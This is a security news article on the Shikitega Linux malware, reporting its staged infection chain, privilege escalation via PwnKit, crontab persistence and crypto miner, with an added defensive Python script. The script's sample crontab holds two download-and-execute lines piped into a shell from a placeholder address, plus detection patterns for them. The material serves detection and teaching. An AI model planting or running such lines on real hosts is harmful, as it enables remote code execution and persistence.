A new piece of stealthy Linux malware known as Shikitega has been uncovered adopting a multi-stage infection chain to compromise endpoints and IoT devices and drop additional payloads.
“An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist,” AT&T Alien Labs said in a new report published Tuesday.
Once deployed on a targeted host, the attack chain downloads and executes Metasploit’s “Mettle” meterpreter to maximize control, exploits vulnerabilities to elevate its privileges, adds persistence on the host via crontab, and ultimately launches a cryptocurrency miner on infected devices.
The exact method by which the initial compromise is achieved remains unknown as yet, but what makes Shikitega evasive is its ability to download next-stage payloads from a command-and-control (C2) server and execute them directly in memory.
Privilege escalation is achieved by exploiting CVE-2021-4034 (aka PwnKit) and CVE-2021-3493, enabling the adversary to abuse the elevated permissions to fetch and execute the final-stage shell scripts with root privileges to establish persistence and deploy the Monero crypto miner.
In a further attempt to fly under the radar, the malware operators employ a “Shikata ga nai” polymorphic encoder to make it harder to detect by antivirus engines and abuse legitimate cloud services for C2 functions.
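Two host-side checks a defender can run against the behaviours described above, crontab persistence and in-memory execution of downloaded payloads. This is an added example, not code from the AT&T Alien Labs report; the crontab text and the process list are constructed samples, and the address 203.0.113.10 is a documentation placeholder.

```python
import re
from typing import List, Tuple

# Constructed sample crontab (not from the report): one benign entry and two
# entries that mimic download-and-execute persistence.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot curl -s http://203.0.113.10/x.sh | sh
*/5 * * * * wget -qO- 203.0.113.10/u | bash -
"""

# A fetch tool piped straight into a shell, or anything executed from a
# world-writable temp directory, is worth a closer look in any crontab.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")
TMP_EXEC = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")


def suspicious_cron_entries(crontab_text: str) -> List[str]:
    """Return crontab lines whose command part looks like download-and-execute."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Separate the schedule (five fields, or an @keyword) from the command.
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        command = parts[-1] if len(parts) > 1 else ""
        if DOWNLOAD_EXEC.search(command) or TMP_EXEC.search(command):
            hits.append(line)
    return hits


def memory_only_processes(proc_exe_links: List[Tuple[int, str]]) -> List[int]:
    """Given (pid, readlink('/proc/<pid>/exe')) pairs, return PIDs whose
    executable exists only in memory: a memfd: image or a '(deleted)' file,
    the footprint left by payloads executed without touching disk."""
    return [pid for pid, exe in proc_exe_links
            if exe.startswith("/memfd:") or exe.endswith("(deleted)")]


if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("suspicious crontab entry:", entry)
    # Constructed process list; on a live Linux host you would build it from /proc.
    sample_procs = [(1, "/usr/lib/systemd/systemd"), (4242, "/memfd:x (deleted)")]
    print("memory-only PIDs:", memory_only_processes(sample_procs))
```

Both checks are heuristics: a deleted binary also appears after a legitimate package upgrade, so treat a hit as a lead to triage, not a verdict.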
Shikitega is also indicative of a trend toward malicious actors expanding their attack reach to cover the Linux operating system, which is widely used in cloud platforms and servers worldwide, contributing to a surge in LockBit and Cheerscrypt ransomware infections.
According to Trend Micro’s 2022 Midyear Cybersecurity Report, “the emergence of these new Linux ransomware families directly corresponds to […] a 75% increase in ransomware attacks targeting Linux systems in the first half of 2022 compared to the first half of 2021.”
“Threat actors continue to search for ways to deliver malware in new ways to stay under the radar and avoid detection,” AT&T Alien Labs researcher Ofer Caspi said.
“Shikitega malware is delivered in a sophisticated way; it uses a polymorphic encoder, and it gradually delivers its payload, where each step reveals only part of the total payload.”